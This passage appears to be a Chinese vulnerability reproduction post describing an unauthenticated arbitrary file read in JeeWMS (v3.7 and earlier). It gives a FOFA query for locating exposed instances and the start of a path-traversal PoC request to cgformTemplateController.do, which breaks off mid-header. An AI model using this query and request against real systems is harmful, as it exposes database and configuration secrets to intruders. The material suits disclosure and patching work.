0x01 产品简介
JeeWMS基于JAVA的智能仓储管理系统(支持3PL(三方物流)和厂内物流),包含PDA端和WEB端,功能涵盖WMS(仓库管理系统),OMS(订单管理系统),BMS(财务管理系统),TMS(运输管理系统),成功应用于多家国内知名大客户,客户群体:冷链,干仓,快消品,汽车主机厂和配件厂等行业。
0x02 漏洞概述
JeeWMS cgformTemplateController.do 存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x03 影响范围
Jeewms <= v.3.7
0x04 复现环境
FOFA:
body="url:userController.do?userOrgSelect&userId=" && "loginController.do?changeDefaultOrg"
0x05 漏洞复现
PoC
POST /rest/../cgformTemplateController.do?showPic HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like